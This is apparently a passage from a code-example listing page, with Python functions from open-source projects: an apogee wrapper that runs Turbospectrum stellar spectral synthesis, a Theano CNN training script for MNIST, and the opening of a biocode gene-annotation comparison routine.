    for arg in args:
        indiv_abu[arg[0]]= arg[1]+solarabundances._ASPLUND05[arg[0]]\
            +modelatm._metals
        if arg[0] == 6: indiv_abu[arg[0]]+= modelatm._cm
        if arg[0] in [8,10,12,14,16,18,20,22]: indiv_abu[arg[0]]+= modelatm._am
    modelopac= kwargs.get('modelopac',None)
    if modelopac is None or \
            (isinstance(modelopac,str) and not os.path.exists(modelopac)):
        # Now write the script file for babsma_lu
        scriptfilename= os.path.join(tmpDir,'babsma.par')
        modelopacname= os.path.join(tmpDir,'mopac')
        _write_script(scriptfilename,
                      babsma_wmin,babsma_wmax,dw,
                      None,
                      modelfilename,
                      None,
                      modelopacname,
                      modelatm._metals,
                      modelatm._am,
                      indiv_abu,
                      kwargs.get('vmicro',2.),
                      None,None,None,bsyn=False)
        # Run babsma
        sys.stdout.write('\r'+"Running Turbospectrum babsma_lu ...\r")
        sys.stdout.flush()
        if kwargs.get('verbose',False):
            stdout= None
            stderr= None
        else:
            stdout= open('/dev/null', 'w')
            stderr= subprocess.STDOUT
        try:
            p= subprocess.Popen(['babsma_lu'],
                                cwd=tmpDir,
                                stdin=subprocess.PIPE,
                                stdout=stdout,
                                stderr=stderr)
            with open(os.path.join(tmpDir,'babsma.par'),'r') as parfile:
                for line in parfile:
                    p.stdin.write(line.encode('utf-8'))
            stdout, stderr= p.communicate()
        except subprocess.CalledProcessError:
            for linelistfilename in linelistfilenames:
                os.remove(linelistfilename,tmpDir)
            if os.path.exists(os.path.join(tmpDir,'DATA')):
                os.remove(os.path.join(tmpDir,'DATA'))
            raise RuntimeError("Running babsma_lu failed ...")
        finally:
            if os.path.exists(os.path.join(tmpDir,'babsma.par')) \
                    and not 'saveTurboInput' in kwargs:
                os.remove(os.path.join(tmpDir,'babsma.par'))
            sys.stdout.write('\r'+download._ERASESTR+'\r')
            sys.stdout.flush()
        if isinstance(modelopac,str):
            shutil.copy(modelopacname,modelopac)
    else:
        shutil.copy(modelopac,tmpDir)
        modelopacname= os.path.join(tmpDir,os.path.basename(modelopac))
    # Now write the script file for bsyn_lu
    scriptfilename= os.path.join(tmpDir,'bsyn.par')
    outfilename= os.path.join(tmpDir,'bsyn.out')
    _write_script(scriptfilename,
                  wmin,wmax,dw,
                  costheta,
                  modelfilename,
                  None,
                  modelopacname,
                  modelatm._metals,
                  modelatm._am,
                  indiv_abu,
                  None,
                  outfilename,
                  isotopes,
                  linelistfilenames,
                  bsyn=True)
    # Run bsyn
    sys.stdout.write('\r'+"Running Turbospectrum bsyn_lu ...\r")
    sys.stdout.flush()
    if kwargs.get('verbose',False):
        stdout= None
        stderr= None
    else:
        stdout= open('/dev/null', 'w')
        stderr= subprocess.STDOUT
    try:
        p= subprocess.Popen(['bsyn_lu'],
                            cwd=tmpDir,
                            stdin=subprocess.PIPE,
                            stdout=stdout,
                            stderr=stderr)
        with open(os.path.join(tmpDir,'bsyn.par'),'r') as parfile:
            for line in parfile:
                p.stdin.write(line.encode('utf-8'))
        stdout, stderr= p.communicate()
    except subprocess.CalledProcessError:
        raise RuntimeError("Running bsyn_lu failed ...")
    finally:
        if 'saveTurboInput' in kwargs:
            turbosavefilename= kwargs['saveTurboInput']
            if os.path.dirname(turbosavefilename) == '':
                turbosavefilename= os.path.join(os.getcwd(),turbosavefilename)
            try:
                subprocess.check_call(['tar','cvzf',turbosavefilename,
                                       os.path.basename(os.path.normpath(tmpDir))])
            except subprocess.CalledProcessError:
                raise RuntimeError("Tar-zipping the Turbospectrum input and output failed; you will have to manually delete the temporary directory ...")
            # Need to remove babsma.par, bc not removed above
            if os.path.exists(os.path.join(tmpDir,'babsma.par')):
                os.remove(os.path.join(tmpDir,'babsma.par'))
        if os.path.exists(os.path.join(tmpDir,'bsyn.par')):
            os.remove(os.path.join(tmpDir,'bsyn.par'))
        if os.path.exists(modelopacname):
            os.remove(modelopacname)
        if os.path.exists(modelopacname+'.mod'):
            os.remove(modelopacname+'.mod')
        if os.path.exists(os.path.join(tmpDir,'DATA')):
            os.remove(os.path.join(tmpDir,'DATA'))
        if os.path.exists(os.path.join(tmpDir,'dummy-output.dat')):
            os.remove(os.path.join(tmpDir,'dummy-output.dat'))
        if os.path.exists(modelfilename):
            os.remove(modelfilename)
        if rmLinelists:
            for linelistfilename in linelistfilenames[1:]:
                os.remove(linelistfilename)
        sys.stdout.write('\r'+download._ERASESTR+'\r')
        sys.stdout.flush()
    # Now read the output
    turboOut= numpy.loadtxt(outfilename)
    # Clean up
    os.remove(outfilename)
    os.rmdir(tmpDir)
    # Return wav, cont-norm, full spectrum
    return (turboOut[:,0],turboOut[:,1],turboOut[:,2])

Example 147

Project: mmdgm
Source File: cnn_6layer_mnist_50000.py
View license
def deep_cnn_6layer_mnist_50000(learning_rate=3e-4,
            n_epochs=250,
            dataset='mnist.pkl.gz',
            batch_size=500,
            dropout_flag=0,
            seed=0,
            activation=None):
    
    #cp->cd->cpd->cd->c
    nkerns=[32, 32, 64, 64, 64]
    drops=[1, 0, 1, 0, 0]
    #skerns=[5, 3, 3, 3, 3]
    #pools=[2, 1, 1, 2, 1]
    #modes=['same']*5
    n_hidden=[500]

    
    logdir = 'results/supervised/cnn/mnist/deep_cnn_6layer_50000_'+str(nkerns)+str(drops)+str(n_hidden)+'_'+str(learning_rate)+'_'+str(int(time.time()))+'/'
    if dropout_flag==1:
        logdir = 'results/supervised/cnn/mnist/deep_cnn_6layer_50000_'+str(nkerns)+str(drops)+str(n_hidden)+'_'+str(learning_rate)+'_dropout_'+str(int(time.time()))+'/'
    if not os.path.exists(logdir): os.makedirs(logdir)
    print 'logdir:', logdir
    print 'deep_cnn_6layer_mnist_50000_', nkerns, n_hidden, drops, seed, dropout_flag
    with open(logdir+'hook.txt', 'a') as f:
        print >>f, 'logdir:', logdir
        print >>f, 'deep_cnn_6layer_mnist_50000_', nkerns, n_hidden, drops, seed, dropout_flag

    rng = np.random.RandomState(0)
    rng_share = theano.tensor.shared_randomstreams.RandomStreams(0)
    '''
    '''
    datasets = datapy.load_data_gpu_60000(dataset, have_matrix=True)

    train_set_x, train_set_y, train_y_matrix = datasets[0]
    valid_set_x, valid_set_y, valid_y_matrix = datasets[1]
    test_set_x, test_set_y, test_y_matrix = datasets[2]

    # compute number of minibatches for training, validation and testing
    n_train_batches = train_set_x.get_value(borrow=True).shape[0]
    n_valid_batches = valid_set_x.get_value(borrow=True).shape[0]
    n_test_batches = test_set_x.get_value(borrow=True).shape[0]
    n_train_batches /= batch_size
    n_valid_batches /= batch_size
    n_test_batches /= batch_size

    # allocate symbolic variables for the data
    index = T.lscalar()  # index to a [mini]batch

    # start-snippet-1
    x = T.matrix('x')   # the data is presented as rasterized images
    y = T.ivector('y')  # the labels are presented as 1D vector of
                        # [int] labels
    '''
    dropout
    '''
    drop = T.iscalar('drop')

    y_matrix = T.imatrix('y_matrix') # labels, presented as 2D matrix of int labels 

    print '... building the model'

    layer0_input = x.reshape((batch_size, 1, 28, 28))
    
    if activation =='nonlinearity.relu':
        activation = nonlinearity.relu
    elif activation =='nonlinearity.tanh':
        activation = nonlinearity.tanh
    elif activation =='nonlinearity.softplus':
        activation = nonlinearity.softplus
    
    recg_layer = []
    cnn_output = []

    #1
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, 1, 28, 28),
        filter_shape=(nkerns[0], 1, 5, 5),
        poolsize=(2, 2),
        border_mode='valid', 
        activation=activation
    ))
    if drops[0]==1:
        cnn_output.append(recg_layer[-1].drop_output(layer0_input, drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(layer0_input))

    #2
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[0], 12, 12),
        filter_shape=(nkerns[1], nkerns[0], 3, 3),
        poolsize=(1, 1),
        border_mode='same', 
        activation=activation
    ))
    if drops[1]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))
    #3
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[1], 12, 12),
        filter_shape=(nkerns[2], nkerns[1], 3, 3),
        poolsize=(2, 2),
        border_mode='valid', 
        activation=activation
    ))
    if drops[2]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))

    #4
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[2], 5, 5),
        filter_shape=(nkerns[3], nkerns[2], 3, 3),
        poolsize=(1, 1),
        border_mode='same', 
        activation=activation
    ))
    if drops[3]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))
    #5
    recg_layer.append(ConvMaxPool.ConvMaxPool(
        rng,
        image_shape=(batch_size, nkerns[3], 5, 5),
        filter_shape=(nkerns[4], nkerns[3], 3, 3),
        poolsize=(1, 1),
        border_mode='same', 
        activation=activation
    ))
    if drops[4]==1:
        cnn_output.append(recg_layer[-1].drop_output(cnn_output[-1], drop=drop, rng=rng_share))
    else:
        cnn_output.append(recg_layer[-1].output(cnn_output[-1]))

    mlp_input = cnn_output[-1].flatten(2)

    recg_layer.append(FullyConnected.FullyConnected(
        rng=rng,
        n_in=nkerns[4] * 5 * 5,
        n_out=500,
        activation=activation
    ))

    feature = recg_layer[-1].drop_output(mlp_input, drop=drop, rng=rng_share)

    # classify the values of the fully-connected sigmoidal layer
    classifier = Pegasos.Pegasos(input=feature, rng=rng, n_in=500, n_out=10, weight_decay=0, loss=1)

    # the cost we minimize during training is the NLL of the model
    cost = classifier.hinge_loss(10, y, y_matrix) * batch_size
    weight_decay=1.0/n_train_batches

    # create a list of all model parameters to be fit by gradient descent
    params=[]
    for r in recg_layer:
        params+=r.params
    params += classifier.params

    # create a list of gradients for all model parameters
    grads = T.grad(cost, params)
    l_r = theano.shared(np.asarray(learning_rate, dtype=np.float32))
    get_optimizer = optimizer.get_adam_optimizer_min(learning_rate=l_r, decay1 = 0.1, decay2 = 0.001, weight_decay=weight_decay)
    updates = get_optimizer(params,grads)

    '''
    Save parameters and activations
    '''

    parameters = theano.function(
        inputs=[],
        outputs=params,
    )

    # create a function to compute the mistakes that are made by the model
    test_model = theano.function(
        inputs=[index],
        outputs=classifier.errors(y),
        givens={
            x: test_set_x[index * batch_size: (index + 1) * batch_size],
            y: test_set_y[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0)
        }
    )

    validate_model = theano.function(
        inputs=[index],
        outputs=classifier.errors(y),
        givens={
            x: valid_set_x[index * batch_size: (index + 1) * batch_size],
            y: valid_set_y[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](0)
        }
    )

    train_model_average = theano.function(
        inputs=[index],
        outputs=[cost, classifier.errors(y)],
        givens={
            x: train_set_x[index * batch_size: (index + 1) * batch_size],
            y: train_set_y[index * batch_size: (index + 1) * batch_size],
            y_matrix: train_y_matrix[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](dropout_flag)
        }
    )

    train_model = theano.function(
        inputs=[index],
        outputs=[cost, classifier.errors(y)],
        updates=updates,
        givens={
            x: train_set_x[index * batch_size: (index + 1) * batch_size],
            y: train_set_y[index * batch_size: (index + 1) * batch_size],
            y_matrix: train_y_matrix[index * batch_size: (index + 1) * batch_size],
            drop: np.cast['int32'](dropout_flag)
        }
    )

    print '... training'
    # early-stopping parameters
    patience = n_train_batches * 100  # look as this many examples regardless
    patience_increase = 2  # wait this much longer when a new best is
                           # found
    improvement_threshold = 0.995  # a relative improvement of this much is
                                   # considered significant
    validation_frequency = min(n_train_batches, patience / 2)
                                  # go through this many
                                  # minibatche before checking the network
                                  # on the validation set; in this case we
                                  # check every epoch

    best_validation_loss = np.inf
    best_test_score = np.inf
    test_score = 0.
    start_time = time.clock()
    epoch = 0
    decay_epochs = 150

    while (epoch < n_epochs):
        epoch = epoch + 1
        tmp1 = time.clock()

        minibatch_avg_cost = 0
        train_error = 0

        for minibatch_index in xrange(n_train_batches):

            co, te = train_model(minibatch_index)
            minibatch_avg_cost+=co
            train_error+=te
            #print minibatch_avg_cost
            # iteration number
            iter = (epoch - 1) * n_train_batches + minibatch_index

            if (iter + 1) % validation_frequency == 0:

                test_epoch = epoch - decay_epochs
                if test_epoch > 0 and test_epoch % 10 == 0:
                    print l_r.get_value()
                    with open(logdir+'hook.txt', 'a') as f:
                        print >>f,l_r.get_value()
                    l_r.set_value(np.cast['float32'](l_r.get_value()/3.0))

                # compute zero-one loss on validation set
                validation_losses = [validate_model(i)
                                     for i in xrange(n_valid_batches)]
                this_validation_loss = np.mean(validation_losses)

                this_test_losses = [test_model(i)
                                   for i in xrange(n_test_batches)]
                this_test_score = np.mean(this_test_losses)

                train_thing = [train_model_average(i) for i in xrange(n_train_batches)]
                train_thing = np.mean(train_thing, axis=0)
                        
                print epoch, 'hinge loss and training error', train_thing
                with open(logdir+'hook.txt', 'a') as f:
                    print >>f, epoch, 'hinge loss and training error', train_thing

                if this_test_score < best_test_score:
                    best_test_score = this_test_score

                print(
                    'epoch %i, minibatch %i/%i, validation error %f %%, test error %f %%' %
                    (
                        epoch,
                        minibatch_index + 1,
                        n_train_batches,
                        this_validation_loss * 100,
                        this_test_score *100.
                    )
                )
                with open(logdir+'hook.txt', 'a') as f:
                    print >>f, (
                        'epoch %i, minibatch %i/%i, validation error %f %%, test error %f %%' %
                        (
                            epoch,
                            minibatch_index + 1,
                            n_train_batches,
                            this_validation_loss * 100,
                            this_test_score *100.
                        )
                    )

                # if we got the best validation score until now
                if this_validation_loss < best_validation_loss:
                    #improve patience if loss improvement is good enough
                    if this_validation_loss < best_validation_loss *  \
                       improvement_threshold:
                        patience = max(patience, iter * patience_increase)

                    best_validation_loss = this_validation_loss
                    # test it on the test set

                    test_losses = [test_model(i)
                                   for i in xrange(n_test_batches)]
                    test_score = np.mean(test_losses)

                    print(
                        (
                            '     epoch %i, minibatch %i/%i, test error of'
                            ' best model %f %%'
                        ) %
                        (
                            epoch,
                            minibatch_index + 1,
                            n_train_batches,
                            test_score * 100.
                        )
                    )
                    with open(logdir+'hook.txt', 'a') as f:
                        print >>f, (
                            (
                                '     epoch %i, minibatch %i/%i, test error of'
                                ' best model %f %%'
                            ) %
                            (
                                epoch,
                                minibatch_index + 1,
                                n_train_batches,
                                test_score * 100.
                            )
                        )
        
        if epoch%50==0:
            model = parameters()
            for i in xrange(len(model)):
                model[i] = np.asarray(model[i]).astype(np.float32)
            np.savez(logdir+'model-'+str(epoch), model=model)

        print 'hinge loss and training error', minibatch_avg_cost / float(n_train_batches), train_error / float(n_train_batches)
        print 'time', time.clock() - tmp1
        with open(logdir+'hook.txt', 'a') as f:
            print >>f,'hinge loss and training error', minibatch_avg_cost / float(n_train_batches), train_error / float(n_train_batches)
            print >>f,'time', time.clock() - tmp1

    end_time = time.clock()
    print 'The code run for %d epochs, with %f epochs/sec' % (
        epoch, 1. * epoch / (end_time - start_time))
    print >> sys.stderr, ('The code for file ' +
                          os.path.split(__file__)[1] +
                          ' ran for %.1fs' % ((end_time - start_time)))

Example 148

Project: apogee
Source File: turbospec.py
View license
def turbosynth(*args,**kwargs):
    """
    NAME:
       turbosynth
    PURPOSE:
       Run a Turbospectrum synthesis (direct interface to the Turbospectrum code; use 'synth' for a general routine that generates the non-continuum-normalized spectrum, convolves withe LSF and macrotubulence, and optionally continuum normalizes the output)
    INPUT ARGUMENTS:
       lists with abundances:
          [Atomic number1,diff1]
          [Atomic number2,diff2]
          ...
          [Atomic numberM,diffM]
    SYNTHEIS KEYWORDS:
       isotopes= ('solar') use 'solar' or 'arcturus' isotope ratios; can also be a dictionary with isotope ratios (e.g., isotopes= {'6.012':'0.9375','6.013':'0.0625'})
       wmin, wmax, dw, width= (15000.000, 17000.000, 0.10000000) spectral synthesis limits and step of calculation (see MOOG)
       babsma_wmin, babsma_wmax= (wmin,wmax)) allows opacity limits to be different (broader) than for the synthesis itself
       costheta= (1.) cosine of the viewing angle
    LINELIST KEYWORDS:
          air= (True) if True, perform the synthesis in air wavelengths (affects the default Hlinelist, nothing else; output is in air if air, vacuum otherwise); set to False at your own risk, as Turbospectrum expects the linelist in air wavelengths!)
          Hlinelist= (None) Hydrogen linelists to use; can be set to the path of a linelist file or to the name of an APOGEE linelist; if None, then we first search for the Hlinedata.vac in the APOGEE linelist directory (if air=False) or we use the internal Turbospectrum Hlinelist (if air=True)
       linelist= (None) molecular and atomic linelists to use; can be set to the path of a linelist file or to the name of an APOGEE linelist, or lists of such files; if a single filename is given, the code will first search for files with extensions '.atoms', '.molec' or that start with 'turboatoms.' and 'turbomolec.'
    ATMOSPHERE KEYWORDS:
       modelatm= (None) model-atmosphere instance
       vmicro= (2.) microturbulence (km/s)
       modelopac= (None) 
                  (a) if set to an existing filename: assume babsma_lu has already been run and use this continuous opacity in bsyn_lu
                  (b) if set to a non-existing filename: store the continuous opacity in this file
    MISCELLANEOUS KEYWORDS:
       dr= data release
       saveTurboInput= if set to a string, the input to and output from Turbospectrum will be saved as a tar.gz file with this name; can be a filename in the current directory or a full path
    OUTPUT:
       (wavelengths,cont-norm. spectrum, spectrum (nwave))
    HISTORY:
       2015-04-13 - Written - Bovy (IAS)
    """
    # Get the spectral synthesis limits
    wmin= kwargs.pop('wmin',_WMIN_DEFAULT)
    wmax= kwargs.pop('wmax',_WMAX_DEFAULT)
    dw= kwargs.pop('dw',_DW_DEFAULT)
    babsma_wmin= kwargs.pop('babsma_wmin',wmin)
    babsma_wmax= kwargs.pop('babsma_wmax',wmax)
    if babsma_wmin > wmin or babsma_wmax < wmax:
        raise ValueError("Opacity wavelength range must encompass the synthesis range")
    if int(numpy.ceil((wmax-wmin)/dw > 150000)):
        raise ValueError('Too many wavelengths for Turbospectrum synthesis, reduce the wavelength step dw (to, e.g., 0.016)')
    costheta= kwargs.pop('costheta',1.)
    # Linelists
    Hlinelist= kwargs.pop('Hlinelist',None)
    linelist= kwargs.pop('linelist',None)
    # Parse isotopes
    isotopes= kwargs.pop('isotopes','solar')
    if isinstance(isotopes,str) and isotopes.lower() == 'solar':
        isotopes= {}
    elif isinstance(isotopes,str) and isotopes.lower() == 'arcturus':
        isotopes= {'6.012':'0.9375',
                   '6.013':'0.0625'}
    elif not isinstance(isotopes,dict):
        raise ValueError("'isotopes=' input not understood, should be 'solar', 'arcturus', or a dictionary")
    # We will run in a subdirectory of the current directory
    tmpDir= tempfile.mkdtemp(dir=os.getcwd())
    # Get the model atmosphere
    modelatm= kwargs.pop('modelatm',None)
    if not modelatm is None:
        if isinstance(modelatm,str) and os.path.exists(modelatm):
            raise ValueError('modelatm= input is an existing filename, but you need to give an Atmosphere object instead')
        elif isinstance(modelatm,str):
            raise ValueError('modelatm= input needs to be an Atmosphere instance')
        else:
            # Check temperature
            if modelatm._teff > 7000.:
                warnings.warn('Turbospectrum does not include all necessary physics to model stars hotter than about 7000 K; proceed with caution',RuntimeWarning)
            # Write atmosphere to file
            modelfilename= os.path.join(tmpDir,'atm.mod')
            modelatm.writeto(modelfilename,turbo=True)
    modeldirname= os.path.dirname(modelfilename)
    modelbasename= os.path.basename(modelfilename)
    # Get the name of the linelists
    if Hlinelist is None:
        if kwargs.get('air',True):
            Hlinelist= 'DATA/Hlinedata' # will be symlinked
        else:
            Hlinelist= appath.linelistPath('Hlinedata.vac',
                                           dr=kwargs.get('dr',None))
    if not os.path.exists(Hlinelist) and not Hlinelist == 'DATA/Hlinedata':
        Hlinelist= appath.linelistPath(Hlinelist,
                                       dr=kwargs.get('dr',None))
    if not os.path.exists(Hlinelist) and not kwargs.get('air',True):
        print("Hlinelist in vacuum linelist not found, using Turbospectrum's, which is in air...")
        Hlinelist= 'DATA/Hlinedata' # will be symlinked
    linelistfilenames= [Hlinelist]
    if isinstance(linelist,str):
        if os.path.exists(linelist):
            linelistfilenames.append(linelist)
        else:
            # Try finding the linelist
            atomlinelistfilename= appath.linelistPath(\
                '%s.atoms' % linelist,
                dr=kwargs.get('dr',None))
            moleclinelistfilename= appath.linelistPath(\
                '%s.molec' % linelist,
                dr=kwargs.get('dr',None))
            if os.path.exists(atomlinelistfilename) \
                    and os.path.exists(moleclinelistfilename):
                linelistfilenames.append(atomlinelistfilename)
                linelistfilenames.append(moleclinelistfilename)
            else:
                atomlinelistfilename= appath.linelistPath(\
                    'turboatoms.%s' % linelist,
                    dr=kwargs.get('dr',None))
                moleclinelistfilename= appath.linelistPath(\
                    'turbomolec.%s' % linelist,
                    dr=kwargs.get('dr',None))
                if not os.path.exists(atomlinelistfilename) \
                        and '201404080919' in atomlinelistfilename \
                        and kwargs.get('air',True):
                    download.linelist(os.path.basename(atomlinelistfilename),
                                      dr=kwargs.get('dr',None))
                if not os.path.exists(moleclinelistfilename) \
                        and '201404080919' in moleclinelistfilename \
                        and kwargs.get('air',True):
                    download.linelist(os.path.basename(moleclinelistfilename),
                                      dr=kwargs.get('dr',None))
                if os.path.exists(atomlinelistfilename) \
                        and os.path.exists(moleclinelistfilename):
                    linelistfilenames.append(atomlinelistfilename)
                    linelistfilenames.append(moleclinelistfilename)
    if linelist is None or len(linelistfilenames) == 1:
        os.remove(modelfilename)
        os.rmdir(tmpDir)
        raise ValueError('linelist= must be set (see documentation) and given linelist must exist (either as absolute path or in the linelist directory)')
    # Link the Turbospectrum DATA directory
    os.symlink(os.getenv('TURBODATA'),os.path.join(tmpDir,'DATA'))
    # Cut the linelist to the desired wavelength range, if necessary,
    # Skipped because it is unnecessary, but left in case we still want to 
    # use it
    rmLinelists= False
    for ll, linelistfilename in enumerate(linelistfilenames[1:]):
        if not _CUTLINELIST: continue #SKIP
        if wmin == _WMIN_DEFAULT and wmax == _WMAX_DEFAULT: continue
        rmLinelists= True
        with open(os.path.join(tmpDir,'cutlines.awk'),'w') as awkfile:
            awkfile.write('($1>%.3f && $1<%.3f) || ( substr($1,1,1) == "' 
                          %(wmin-7.,wmax+7.) +"'"+'")\n')
        keeplines= open(os.path.join(tmpDir,'lines.tmp'),'w')
        stderr= open('/dev/null','w')
        try:
            subprocess.check_call(['awk','-f','cutlines.awk',
                                   linelistfilename],
                                  cwd=tmpDir,stdout=keeplines,stderr=stderr)
            keeplines.close()
        except subprocess.CalledProcessError:
            os.remove(os.path.join(tmpDir,'lines.tmp'))
            os.remove(os.path.join(tmpDir,'DATA'))
            raise RuntimeError("Removing unnecessary linelist entries failed ...")
        finally:
            os.remove(os.path.join(tmpDir,'cutlines.awk'))
            stderr.close()
        # Remove elements that aren't used altogether, adjust nlines
        with open(os.path.join(tmpDir,'lines.tmp'),'r') as infile:
            lines= infile.readlines()
        nl_list= [l[0] == "'" for l in lines]
        nl= numpy.array(nl_list,dtype='int')
        nl_list.append(True)
        nl_list.append(True)
        nlines= [numpy.sum(1-nl[ii:nl_list[ii+2:].index(True)+ii+2]) 
                 for ii in range(len(nl))]
        with open(os.path.join(tmpDir,os.path.basename(linelistfilename)),
                  'w') \
                as outfile:
            for ii, line in enumerate(lines):
                if ii < len(lines)-2:
                    if not lines[ii][0] == "'":
                        outfile.write(lines[ii])
                    elif not (lines[ii+2][0] == "'" and lines[ii+1][0] == "'"):
                        if lines[ii+1][0] == "'":
                            # Adjust nlines                       
                            outfile.write(lines[ii].replace(lines[ii].split()[-1]+'\n',
                                                            '%i\n' % nlines[ii]))
                        else:
                            outfile.write(lines[ii])
                else:
                    if not lines[ii][0] == "'": outfile.write(lines[ii])
        os.remove(os.path.join(tmpDir,'lines.tmp'))
        # cp the linelists to the temporary directory
        shutil.copy(linelistfilename,tmpDir)
        linelistfilenames[ll]= os.path.basename(linelistfilename)
    # Parse the abundances
    if len(args) == 0: #special case that there are *no* differences
        args= ([26,0.],)
    indiv_abu= {}
    for arg in args:
        indiv_abu[arg[0]]= arg[1]+solarabundances._ASPLUND05[arg[0]]\
            +modelatm._metals
        if arg[0] == 6: indiv_abu[arg[0]]+= modelatm._cm
        if arg[0] in [8,10,12,14,16,18,20,22]: indiv_abu[arg[0]]+= modelatm._am
    modelopac= kwargs.get('modelopac',None)
    if modelopac is None or \
            (isinstance(modelopac,str) and not os.path.exists(modelopac)):
        # Now write the script file for babsma_lu
        scriptfilename= os.path.join(tmpDir,'babsma.par')
        modelopacname= os.path.join(tmpDir,'mopac')
        _write_script(scriptfilename,
                      babsma_wmin,babsma_wmax,dw,
                      None,
                      modelfilename,
                      None,
                      modelopacname,
                      modelatm._metals,
                      modelatm._am,
                      indiv_abu,
                      kwargs.get('vmicro',2.),
                      None,None,None,bsyn=False)
        # Run babsma
        sys.stdout.write('\r'+"Running Turbospectrum babsma_lu ...\r")
        sys.stdout.flush()
        if kwargs.get('verbose',False):
            stdout= None
            stderr= None
        else:
            stdout= open('/dev/null', 'w')
            stderr= subprocess.STDOUT
        try:
            p= subprocess.Popen(['babsma_lu'],
                                cwd=tmpDir,
                                stdin=subprocess.PIPE,
                                stdout=stdout,
                                stderr=stderr)
            with open(os.path.join(tmpDir,'babsma.par'),'r') as parfile:
                for line in parfile:
                    p.stdin.write(line.encode('utf-8'))
            stdout, stderr= p.communicate()
        except subprocess.CalledProcessError:
            for linelistfilename in linelistfilenames:
                os.remove(linelistfilename,tmpDir)
            if os.path.exists(os.path.join(tmpDir,'DATA')):
                os.remove(os.path.join(tmpDir,'DATA'))
            raise RuntimeError("Running babsma_lu failed ...")
        finally:
            if os.path.exists(os.path.join(tmpDir,'babsma.par')) \
                    and not 'saveTurboInput' in kwargs:
                os.remove(os.path.join(tmpDir,'babsma.par'))
            sys.stdout.write('\r'+download._ERASESTR+'\r')
            sys.stdout.flush()
        if isinstance(modelopac,str):
            shutil.copy(modelopacname,modelopac)
    else:
        shutil.copy(modelopac,tmpDir)
        modelopacname= os.path.join(tmpDir,os.path.basename(modelopac))
    # Now write the script file for bsyn_lu
    scriptfilename= os.path.join(tmpDir,'bsyn.par')
    outfilename= os.path.join(tmpDir,'bsyn.out')
    _write_script(scriptfilename,
                  wmin,wmax,dw,
                  costheta,
                  modelfilename,
                  None,
                  modelopacname,
                  modelatm._metals,
                  modelatm._am,
                  indiv_abu,
                  None,
                  outfilename,
                  isotopes,
                  linelistfilenames,
                  bsyn=True)
    # Run bsyn
    sys.stdout.write('\r'+"Running Turbospectrum bsyn_lu ...\r")
    sys.stdout.flush()
    if kwargs.get('verbose',False):
        stdout= None
        stderr= None
    else:
        stdout= open('/dev/null', 'w')
        stderr= subprocess.STDOUT
    try:
        p= subprocess.Popen(['bsyn_lu'],
                            cwd=tmpDir,
                            stdin=subprocess.PIPE,
                            stdout=stdout,
                            stderr=stderr)
        with open(os.path.join(tmpDir,'bsyn.par'),'r') as parfile:
            for line in parfile:
                p.stdin.write(line.encode('utf-8'))
        stdout, stderr= p.communicate()
    except subprocess.CalledProcessError:
        raise RuntimeError("Running bsyn_lu failed ...")
    finally:
        if 'saveTurboInput' in kwargs:
            turbosavefilename= kwargs['saveTurboInput']
            if os.path.dirname(turbosavefilename) == '':
                turbosavefilename= os.path.join(os.getcwd(),turbosavefilename)
            try:
                subprocess.check_call(['tar','cvzf',turbosavefilename,
                                       os.path.basename(os.path.normpath(tmpDir))])
            except subprocess.CalledProcessError:
                raise RuntimeError("Tar-zipping the Turbospectrum input and output failed; you will have to manually delete the temporary directory ...")
            # Need to remove babsma.par, bc not removed above
            if os.path.exists(os.path.join(tmpDir,'babsma.par')):
                os.remove(os.path.join(tmpDir,'babsma.par'))
        if os.path.exists(os.path.join(tmpDir,'bsyn.par')):
            os.remove(os.path.join(tmpDir,'bsyn.par'))
        if os.path.exists(modelopacname):
            os.remove(modelopacname)
        if os.path.exists(modelopacname+'.mod'):
            os.remove(modelopacname+'.mod')
        if os.path.exists(os.path.join(tmpDir,'DATA')):
            os.remove(os.path.join(tmpDir,'DATA'))
        if os.path.exists(os.path.join(tmpDir,'dummy-output.dat')):
            os.remove(os.path.join(tmpDir,'dummy-output.dat'))
        if os.path.exists(modelfilename):
            os.remove(modelfilename)
        if rmLinelists:
            for linelistfilename in linelistfilenames[1:]:
                os.remove(linelistfilename)
        sys.stdout.write('\r'+download._ERASESTR+'\r')
        sys.stdout.flush()
    # Now read the output
    turboOut= numpy.loadtxt(outfilename)
    # Clean up
    os.remove(outfilename)
    os.rmdir(tmpDir)
    # Return wav, cont-norm, full spectrum
    return (turboOut[:,0],turboOut[:,1],turboOut[:,2])

Example 149

Project: biocode
Source File: compare_gene_structures.py
View license
def process_files(args):
    (assemblies_1, features_1) = biocodegff.get_gff3_features(args.annotation_1)
    (assemblies_2, features_2) = biocodegff.get_gff3_features(args.annotation_2)


    a_exons = []                                    ## Set contains only uniq exons from known annotation, since multiple same exons can appear in a gff file.  
    p_exons = []                                    ## For predicted annotation

    a_gene = []
    p_gene = []

    a_mrna = []
    p_mrna = []

    exon_pred_all = set()
    gene_true = set()
    mrna_true = set()



    chr = []

    a_cds = []                                   
    p_cds = []                                   

    a_cd = []
    p_cd= []
    chr = []

    true_pred_file = args.output_dir + '/true_predicted_genes.txt'
    true_file = open(true_pred_file,'w')
    true_file.write("Known\tPredicted\n")
    
    for asm_id in assemblies_1:                                                                                     ## Iterate through each chromosome from the known ref annotation        
        assembly_1 = assemblies_1[asm_id]
        assembly_2 = assemblies_2.get(asm_id,-1)                                                                    ## Find that chromosome in the predicted gff file
        genes_1 = assembly_1.genes()                                                                                ## All genes from known annotation
        anno_exons = set()

        for gene_1 in sorted(genes_1) :                                                                                     ## Add unique gene, mrna , exon features from known annotation to get each known feature total count 
